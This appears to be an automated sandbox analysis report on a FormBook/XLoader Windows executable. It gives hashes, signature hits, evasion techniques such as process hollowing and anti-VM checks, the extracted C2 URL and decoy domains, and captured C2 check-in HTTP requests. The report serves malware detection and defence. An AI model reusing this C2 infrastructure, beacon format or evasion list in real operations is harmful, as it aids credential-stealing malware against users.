Windows Analysis Report cK1g5gckZR9VHjj.exe

Overview

General Information

Sample Name: cK1g5gckZR9VHjj.exe
Analysis ID: 528618
MD5: 5f19b9a3e41ef2e6ec3200bf4a246cec
SHA1: 25638b49edf7444005e1e02fb5d972da5920e1d8
SHA256: afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
Tags: exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
Yara detected FormBook
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: cK1g5gckZR9VHjj.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: cK1g5gckZR9VHjj.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 4x nop then pop edi 2_2_00415660
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 4x nop then pop esi 2_2_004157D8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 4x nop then pop esi 2_2_004157AA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 12_2_02DD5660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop esi 12_2_02DD57D8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop esi 12_2_02DD57AA

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 142.252.22.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.94.210.101 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.dragonmodz.net
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe Domain query: www.qzttb.net
Source: C:\Windows\explorer.exe Domain query: www.royaldears.com
Source: C:\Windows\explorer.exe Domain query: www.pittsburghdata.center
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.spoiledzone.com/udeh/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.64.163.50 3.64.163.50
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: PHP/7.0.33X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 14:11:35 GMTConnection: closeContent-Length: 7447Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: www.qzttb.net
Source: global traffic HTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: cK1g5gckZR9VHjj.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
